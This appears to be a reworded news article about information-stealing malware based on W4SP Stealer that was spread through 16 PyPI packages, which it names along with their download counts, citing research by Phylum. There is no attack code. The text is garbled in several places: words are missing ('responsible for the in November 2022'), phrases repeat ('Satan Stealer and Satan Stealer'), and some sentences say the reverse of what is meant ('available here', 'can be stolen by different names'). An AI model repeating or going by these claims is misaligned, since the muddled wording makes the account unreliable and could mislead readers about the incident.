SS7
PyPi is inundated with malware designed to steal information by hackers
A wave of malware that steals information from software developers is attacking the PyPi Python package repository.
This campaign contains malware that is a copy of W4SP Stealer’s open-source W4SP Stealer. It was responsible for the in November 2022 on PyPI.
An additional 31 malware packages dropped by ‘W4SP” have since been deleted from PyPI. The malware operators continue to search for new ways to introduce their malware to the PyPI platform.
Targeting open-source developers
The Phylum research group reported last week that it found which distributed W4SP via PyPI. This operation was stopped by GitHub, which closed the repository that the threat actor used to fetch the primary payload.
Yesterday, the cybersecurity company reported that 16 PyPI packages are spreading 10 information-stealing malware versions based on W4SP Stealer.
These malicious programs contain information thieves and are available here:
- Modulesecurity – 114 Downloads
- Informmodule – 110 Downloads
- chazz – 118 downloads
- Randomtime – 118 Downloads
- proxygeneratorbil – 91 downloads
- easycordey – 122 Downloads
- easycordeyy – 103 Downloads
- tomproxies – 150 Downloads
- Sys-ej Downloads: 186
- py4sync – 453 downloads
- infosys – 191 downloads
- sysuptoer – 186 downloads
- nowsys – 202 Downloads
- Upamonkws – 205 Downloads
- Captchaboy – 123 Downloads
- proxybooster – 69 Downloads
These packages can be stolen by different names like Celestial Stealer or ANGEL Stealer. Satan Stealer and Satan Stealer are some examples. However, Phylum discovered that all of them use the W4SP code.
The new thieves do not use W4SP’s complicated attack chain, which includes multiple stages and code obsfuscation.
They instead drop the code of the thief directly in the “main.py”, or “_init_.py”, files without any encoding. This allows for a quick code review to reveal their true nature.
Informmodule ‘_init_.py’ code
(Phylum)
Although the “chazz” package drops the copy of “Leaf $tealer,” it is still fairly easy to deobfuscate.
The new thieves use the W4SP-style tactics to steal the malware payload. They also access remote resources through GitHub repositories.
The GitHub repository of Satan Stealer
(Phylum)
Although it is not clear if these “clones of malware” were created by the same threat agents behind W4SP, or copycats thereof, Phylum suggests that they are from other groups trying to replicate previous campaigns.
Although all the packages in this report were removed from PyPI’s repository, they were still downloaded more than 2,500 times.
As hackers have become more interested in open-source packages repositories, they are able to compromise developer systems and launch even greater attacks.
Developers often store API keys and authorization tokens in their apps. This could make it easier for threat actors to steal information or conduct larger supply chains attacks.
We will see more threat actors uploading malware packages to open-source repositories as long as there are enough infections.